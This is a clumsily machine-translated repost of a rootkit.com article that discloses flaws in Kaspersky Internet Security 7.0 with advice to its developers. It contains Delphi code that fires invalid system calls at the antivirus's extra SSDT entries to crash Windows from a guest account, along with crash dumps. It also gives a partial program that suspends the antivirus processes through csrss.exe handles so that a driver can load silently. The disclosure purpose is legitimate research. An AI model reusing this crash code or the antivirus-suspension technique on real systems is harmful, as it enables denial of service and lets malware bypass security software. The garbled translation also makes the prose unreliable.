13:56 Backdoors Kaspersky 6 / 7 | |
| Translation of an article from the site rootkit.com Preamble Kaspersky Anti-Virus - one of the most technically advanced anti-virus today. It can even deal with certain types of viruses, even when they were alive and trying to attack. He has a proactive defense module (Proactive Defence), representing a partial implementation of HIPS, is capable, in theory, help protect your computer from unknown threats by analyzing program behavior and preventing unauthorized actions. This is all theory and advertising slogans. In reality, we have a very different situation. There are many viruses, which do not show anti-virus, and its proactive protection can be suppressed so that an attacker can download your driver, then any proactive protection simply useless. This article - not just a review of errors and vulnerabilities - at the end of each part, we give advice to developers antivirus, because we see that they can not deal with these mistakes yourself. And for devotees once Disclaimer: Of course, all that is written below - not critical vulnerability, a no-no =) Just a few simple techniques to get BSOD when installed KAV / KIS even from under the guest account, just a workaround KAV / KIS .. . and so on, in general, do not take too much to heart. Version of Kaspersky, about which will be discussed in this article - 7.0, the latest public build 125, product type - Internet Security. Kaspersky and System Service Descriptor Table This part of the anti-virus has long been known as the most vulnerable. Such, it is due to the fact that it contains a lot of elementary mistakes. These mistakes - yet another example of poorly written proactive protection. Under Windows XP Kaspersky Anti-Virus adds life to the table SSDT. The set of services that exist only under Windows 2003. Their numbers - from 284 to 296. About 13 records with unknown addresses within klif.sys. Here they are: ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BD80 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BD90 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BDA0 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BDC0 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BDE0 hook handler located in [C : \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BE10 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809BE20 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BE40 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BE50 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BF10 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809BFE0 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809C020 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] ntkrnlpa.exe--> UNKNOWN_SSDT_ENTRY, 0xF809C060 hook handler located in [C: \ WINDOWS \ system32 \ drivers \ klif.sys] What is this? Completely incomprehensible. However, it seems that the developers KAV add them to solve the problem with different number of entries in the table SSDT under Windows XP and 2003. Why was this done just that - a question the third. And now the attention of: any of these records may be broken, followed by the collapse of the system to BSOD even from under the guest account with the least privilege. We wrote a small program. It generates invalid system calls with invalid parameters for these mysterious entries in the SSDT. The code is very simple, but effective. Execute it on a clean Windows will not lead to what, because Windows itself to handle these situations correctly. Var Services: array [0 .. 12] of ULONG; ThreadTerminated: boolean = false; ExecThread: THANDLE ; function MakeSysCall (SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall; asm mov eax, SysCallNumber mov edx, Stack int 2eh mov Result, eax end; function exec (p1: pointer): DWORD; stdcall; var i: integer; p2: DWORD; p3: DWORD; begin randomize (); u: = 0; for i: = 0 to 12 do Services [i]: = 284 + i; while not ThreadTerminated do begin p2: = random ($ FFFFFFFF); p3: = Services [random (12)]; MakeSysCall (p3, @ p2); Sleep (100) end; CloseHandle (ExecThread); ExecThread: = 0; result: = 0; end; var p2: DWORD; begin ThreadTerminated: = false; ExecThread: = CreateThread (nil, 0 , @ exec, nil, 0, p2); end; The output: Kaspersky Internet Security v7.0 125 build PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: e0ae15f9, memory referenced. Arg2: 00000000, value 0 = read operation, 1 = write operation. Arg3: f8087e8c, If non-zero, the instruction address which referenced the bad memory address. Arg4: 00000000, (reserved) full text bsod ... But that's not all! Despite the reported vulnerabilities in the existing SSDT developers of Kaspersky still is not fixed them! We can prove this is a simple program called NTCALL. After the start it begins to generate invalid system calls. NtCreateSection - call this function with invalid parameters will result in BSOD in klif.sys. Here is our BSOD: KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e) This is a very common bugcheck. Usually the exception address pinpoints the driver / function that caused the problem. Always note this address as well as the link date of the driver / image that contains this address. Some common problems are exception code 0x80000003. This means a hard coded breakpoint or assertion was hit, but this system was booted / NODEBUG. This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted / DEBUG. This will let us see why this breakpoint is happening. Arguments: Arg1: c0000005, The exception code that was not handled Arg2: 805883ea, The address that the exception occurred at Arg3: f669a95c, Trap Frame Arg4: 00000000 Debugging Details: ------------------ ANALYSIS: Kernel with unknown size. Will force reload symbols with known size. ANALYSIS: Force reload command:. Reload / f ntoskrnl.exe = FFFFFFFF804D7000, 214600,41108004 ***** Kernel symbols are WRONG. Please fix symbols to do analysis. MODULE_NAME: klif full text bsod ... What can I say ...? It's time to stop with the perverted SSDT and write handlers for normal entries SSDT. Take the best and ask Oleg Zaitsev, how to properly install hooks in the SSDT;) Kaspersky and Shadow SSDT (Shadow SSDT) ?? Shadow SSDT - a special table in win32k.sys, which contains the addresses of system functions related to mapping graphical user interface (GDI). Kaspersky sets are hooks on some services to prevent keyloggers and work for self-defense. And again, the hooks are installed bad. NtUserSendInput with invalid parameters, and ... -> Haha, the new BSOD, you do not like some kind of BSOD-generator? =) PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: e1f83004, memory referenced. Arg2: 00000000, value 0 = read operation, 1 = write operation. Arg3: f9417eee, If non-zero, the instruction address which referenced the bad memory address. Arg4: 00000001, (reserved) Debugging Details: ------------------ ANALYSIS: Kernel with unknown size. Will force reload symbols with known size. ANALYSIS: Force reload command:. Reload / f ntoskrnl.exe = FFFFFFFF804D7000, 214600,41108004 ***** Kernel symbols are WRONG. Please fix symbols to do analysis. MODULE_NAME: klif full text bsod ... For this part of the recommendation is simple - run your driver under the debugger. The following code var p1: PChar; begin p1: = PChar ($ ffffffff); ; LoadLibraryA (p1); end; leads to an Acces Violation and that's OK, because we used an incorrect parameter to a function, but the fact that NOTOK - this is where there Acess Violation, at - 0xF80B3306. This is no joke - 0xF80B3306. In the processes of the nucleus! Or to be exact - in klif.sys. Let's see what happens. We found a strong modification of the IAT (1, 2) for each process in the system. See what happens to explorer.exe [420] explorer.exe--> kernel32.dll--> LoadLibraryExA, Type: IAT Modification at address 0x010010A8 -> 7C882FB0 hook handler located in [kernel32.dll] [420] explorer.exe--> kernel32.dll--> LoadLibraryExW, Type: IAT Modification at address 0x010010F8 -> 7C882FD8 hook handler located in [kernel32.dll] [420] explorer.exe--> kernel32.dll--> LoadLibraryA, Type: IAT Modification at address 0x01001150 -> 7C882F9C hook handler located in [ kernel32.dll] [420] explorer.exe--> kernel32.dll--> LoadLibraryW, Type: IAT Modification at address 0x010011D0 -> 7C882FC4 hook handler located in [kernel32.dll] [ 420] explorer.exe--> kernel32.dll--> GetProcAddress, Type: IAT Modification at address 0x010011E4 -> 7C882FEC hook handler located in [kernel32.dll] Strange, is not it? Let's track the call LoadLibraryA. KERNEL32.LoadLibraryA: push ebp mov ebp, esp nop pop ebp jmp + $ 7b830b4a / / - redirect to klif.sys nop nop nop nop nop nop nop nop nop nop Here is the inside kernel32.dll LoadLibraryA after IAT redirection Kaspersky Antivirus. Is not it a perversion? If you install this antivirus on your computer, you (what irony!) Open it to additional vulnerabilities and backdoors created by Kaspersky Anti-Virus! Laughter, and only. In this part, we recommend that developers of Kaspersky to remove distortions of their product. Firstly there are better and easier ways to communicate with the kernel process, and secondly - it's just a perversion. Kaspersky Anti-Virus and self-defense Like most of you know, Kaspersky Anti-Virus actively defends itself against attacks. Its processes are protected from unauthorized access and destruction of malware. But the question is: how well they protected? A: Poor. Kaspersky sets a few hooks in the SSDT (ie NtOpenProcess, NtOpenThread, NtTerminateProcess etc) and a few hooks in the Shadow SSDT (NtUserFindWindowEx, NtUserBuildHwndList, etc.) to further protect themselves from attack. In the end, it installs itself as a service to the settings restart when an error occurs. Service settings are protected in the registry a few hooks in the SSDT. So how can we kill this antivirus? And do we need to kill him? If we kill avp.exe visual part of it will be re-launched the service. If we kill the service - it will launch service control manager (SCM). So how can we destroy the antivirus (in the educational purposes of course)? Good question. The answer is simple - load the driver, then we will be outside the zone of interests of KAV. But first we need to pause to get the opportunity, is not it? Not quite. There are at least three methods by which you can download the driver silently without any reaction from the Proactive Defense Kaspersky 7.0. And I'm sure that there are other methods. In our case, we simply suspend (suspend) all streams (threads) processes, Kaspersky Anti-Virus, simply pause, nothing more - that's enough. We can not access the Kaspersky process directly because the owner of the SSDT is PDM. So it's time to use a "favorite" backdoor process named csrss.exe:) In this example we assume a priori that KAV application called avp.exe and csrss.exe exists in one copy (LOL, yes, if you have malware running on ring3 and masquerading as csrss.exe, then this code will have certain problems). ... PBuffer.dwSize: = sizeof (PROCESSENTRY32W); SnapShotHandle: = CreateToolHelp32SnapShot (TH32CS_SNAPPROCESS, 0); ... if (ZwOpenProcess (@ ph, PROCESS_ALL_ACCESS, @ attr, @ cid1) STATUS_SUCCESS) then exit; ... ZwAllocateVirtualMemory (GetCurrentProcess (), @ buf, 0, @ bytesIO, MEM_COMMIT, PAGE_READWRITE); ZwQuerySystemInformation (SystemHandleInformation, buf, 4194304, @ bytesIO); full text of the program .. . After this, both deployed by the module of Kaspersky will be suspended and we can download the driver and do their work quietly =) Tested on KIS v7.0 build 125 with the default settings. Windws XP SP2, an administrator. We recommend that LC undergo a HANDLE_TABLE and change the permissions for the handlers of their processes. Plus, it's time to improve hook NtDuplicateObject. EPILOGUE You probably are wondering why such obvious mistakes - really backdoors there are still one of the most popular antivirus software? Because someone has a good give up the backside of Kaspersky Lab. Not so long ago, we published another review errors KAV. The reaction was expected. They said something like "Do not worry, it's not critical errors." Well, maybe blue screen of death of a Guest account is not such a big problem for the company. "Indeed. Che for the BSOD at all? Bullshit, relax guys":) But something is changing - they have closed several published vulnerabilities, so that should say a little thanks to us. Instead we get a lot of $@%$&#! in the address (unofficially, of course). Well, we're just not concerned about such a reaction, so do not bother guys (fanatics?). We do not want self-promotion and do not want to watch tupeyshie BSOD-s from Kaspersky. Dear developers of Kaspersky Lab, your antivirus is very good about it no doubt, but maybe it's time to fix these bugs? Remove distortions from the SSDT / IAT. Carefully handled by the critical situation in its driver. No seriously, what's wrong? Despite the klif.sys I see only one - big, buggy driver. By the way, a kind of informal response from the Kaspersky Lab in our previous survey klif.sys you can read this wonderful article, which contains some absurd claims and do not carry meaning comments. In a few words: the author of this article were partially blamed us in publishing information about vulnerabilities in their old and new products. Http://www.viruslist.ru/analysis?pubid=2 ... Article in Russian, but I'm sure you'll find the English version. Have fun, of VX heavens EP_X0FF/UG North rootkit.com smartov: Quote from the article about which they say at the end In recent years, is extremely important following situation. And one of the cyber environment (or "researchers" cloaked with white hats) develops the concept of code, bypassing the modern means of protection, and in order to samopiara, disguised as concern for the progress and publishes it as "undetectable." We emphasize: of course, in reality this concept is not essentially undetectable, but undetectable at the level of the one-two-step workaround known functions of protection. Make a one-step traversal is quite easy, if we know the mechanisms of protection. Such publications make worry a certain percentage of users who are not familiar with the principles of malware and antivirus software ("And if my anti-virus protection tool of this new type of threat?). In this situation, producers of remedies can only throw the proportion of resources to restore its credibility: the development of circumvention technologies described the concept, usually the same as the concept itself - one-step. As a result, the authority is restored (and how could it be otherwise?), The system "Trojan - Antivirus - the user" comes in original condition, and the process loops. Each new iteration of it generates more and more sophisticated malware and increasingly heavy protective equipment. As KVN: "Great plan!". Kinda byaki publish vulnerability, and because of this poor, miserable antivirus manufacturers have to break away from cutting the cabbage to develop a new improved user interface and start getting it fixed. P.s. Near the installed KAV 7.0.0.125 ... | |
|
| |
| Total comments: 0 | |